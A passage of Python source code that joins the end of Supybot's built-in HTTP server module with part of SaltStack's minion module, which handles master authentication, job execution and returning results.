log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback(object):
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
__metaclass__ = log.MetaFirewall
__firewalled__ = {'doGet': None,
'doPost': None,
'doHead': None,
'doPut': None,
'doDelete': None,
}
fullpath = False
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overridden this message nor defined a handler for this query.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(400)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.defaultResponse))
self.end_headers()
self.wfile.write(self.defaultResponse.encode())
doPost = doHead = doGet
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
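# A minimal sketch of a plugin-side callback (the class name, subdir and
# response text below are illustrative only, not part of Supybot itself):
# subclass SupyHTTPServerCallback, implement doGet(), and register it with
# hook() so requests to /hello/ are routed to it.
#
# class HelloCallback(SupyHTTPServerCallback):
#     name = 'Hello plugin'
#     def doGet(self, handler, path, *args, **kwargs):
#         response = 'Hello from a plugin!'
#         handler.send_response(200)
#         self.send_header('Content-Type', 'text/plain; charset=utf-8')
#         self.send_header('Content-Length', len(response))
#         self.end_headers()
#         if sys.version_info[0] >= 3:
#             response = response.encode()
#         self.wfile.write(response)
#
# hook('hello', HelloCallback())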
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
fullpath = True
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particularly
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.response))
self.end_headers()
response = self.response
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
doPost = doHead = doGet
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
fullpath = True
defaultResponse = _("Request not handled.")
def doGet(self, handler, path):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
plugins = '<ul class="plugins"><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = get_template('index.html') % {'list': plugins}
handler.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
class Static(SupyHTTPServerCallback):
"""Serves static files."""
fullpath = True
name = 'static'
defaultResponse = _('Request not handled')
def __init__(self, mimetype='text/plain; charset=utf-8'):
super(Static, self).__init__()
self._mimetype = mimetype
def doGet(self, handler, path):
response = get_template(path)
handler.send_response(200)
self.send_header('Content-type', self._mimetype)
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
class Favicon(SupyHTTPServerCallback):
"""Services the favicon.ico file to browsers."""
name = 'favicon'
defaultResponse = _('Request not handled')
def doGet(self, handler, path):
file_path = conf.supybot.servers.http.favicon()
found = False
if file_path:
try:
icon = open(file_path, 'r')
found = True
except IOError:
pass
if found:
response = icon.read()
filename = file_path.rsplit(os.sep, 1)[1]
if '.' in filename:
ext = filename.rsplit('.', 1)[1]
else:
ext = 'ico'
# I have no idea why, but these headers are already sent.
# self.send_header('Content-Length', len(response))
# self.send_header('Content-type', 'image/' + ext)
# self.end_headers()
self.wfile.write(response)
else:
response = _('No favicon set.')
handler.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
http_servers = []
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global http_servers
addresses4 = [(4, (x, configGroup.port()))
for x in configGroup.hosts4().split(' ') if x != '']
addresses6 = [(6, (x, configGroup.port()))
for x in configGroup.hosts6().split(' ') if x != '']
http_servers = []
for protocol, address in (addresses4 + addresses6):
server = SupyHTTPServer(address, protocol, SupyHTTPRequestHandler)
Thread(target=server.serve_forever, name='HTTP Server').start()
http_servers.append(server)
log.info('Starting HTTP server: %s' % str(server))
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global http_servers
for server in http_servers:
log.info('Stopping HTTP server: %s' % str(server))
server.shutdown()
server = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
"""Sets a callback for a given subdir."""
if not http_servers:
startServer()
assert isinstance(http_servers, list)
for server in http_servers:
server.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global http_servers
assert isinstance(http_servers, list)
for server in list(http_servers):  # iterate over a copy, servers may be removed below
callback = server.unhook(subdir)
if len(server.callbacks) <= 0 and not configGroup.keepAlive():
server.shutdown()
http_servers.remove(server)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.args
import salt.utils.event
import salt.utils.schedule
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if opts.get('file_client', 'remote') == 'local' and check_dns:
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: {0} not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.warn(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolvable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or string_kwarg.keys()[0] in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.iteritems():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
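# A rough sketch of what load_args_and_kwargs() produces (the function below is
# hypothetical and only used for illustration): plain strings stay positional,
# while dicts carrying '__kwarg__': True are unpacked into keyword arguments
# when the target function accepts them.
#
# def example(name, level='info', **kwargs):
#     pass
#
# _args, _kwargs = load_args_and_kwargs(
#     example, ['minion1', {'__kwarg__': True, 'level': 'debug'}])
# # _args   -> ['minion1']
# # _kwargs -> {'level': 'debug'}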
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if self.opts.get('file_client', 'remote') == 'remote':
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
self.opts['_safe_auth'] = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules()
else:
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
id_hash = hash_type(self.opts['id']).hexdigest()
if self.opts.get('hash_type', 'md5') == 'sha256':
id_hash = id_hash[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi-minion interface: this creates as many minions as are
defined in the master option and binds each minion object to its
respective master.
'''
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def _gen_minions(self):
'''
Set up and tune in the minion options
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
return False
minions = []
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
try:
minions.append(Minion(s_opts, 5, False))
except SaltClientError:
minions.append(s_opts)
return minions
def minions(self):
'''
Return a list of minion generators bound to the tune_in method
'''
ret = {}
minions = self._gen_minions()
for minion in minions:
if isinstance(minion, dict):
ret[minion['master']] = minion
else:
ret[minion.opts['master']] = {
'minion': minion,
'generator': minion.tune_in_no_block()}
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
module_refresh = False
pillar_refresh = False
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
last = time.time()
auth_wait = self.opts['acceptance_wait_time']
max_wait = auth_wait * 6
while True:
for minion in minions.values():
if isinstance(minion, dict):
continue
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
while True:
package = self.epull_sock.recv(zmq.NOBLOCK)
if package.startswith('module_refresh'):
module_refresh = True
elif package.startswith('pillar_refresh'):
pillar_refresh = True
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
pass
# get commands from each master
for master, minion in minions.items():
if 'generator' not in minion:
if time.time() - auth_wait > last:
last = time.time()
if auth_wait < max_wait:
auth_wait += auth_wait
try:
if not isinstance(minion, dict):
minions[master] = {'minion': minion}
t_minion = Minion(minion, 5, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
auth_wait = self.opts['acceptance_wait_time']
except SaltClientError:
continue
else:
continue
if module_refresh:
minion['minion'].module_refresh()
if pillar_refresh:
minion['minion'].pillar_refresh()
minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts)
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
sreq = salt.payload.SREQ(self.opts['master_uri'])
try:
result = sreq.send('aes', self.crypticle.dumps(load))
try:
data = self.crypticle.loads(result)
except AuthenticationError:
log.info("AES key changed, re-authenticating")
# We can't decode the master's response to our event,
# so we will need to re-authenticate.
self.authenticate()
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None or not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
        # If the minion does not have the function, don't execute;
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
        # We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
sreq = salt.payload.SREQ(self.opts['master_uri'])
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = sreq.send('aes', self.crypticle.dumps(load))
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
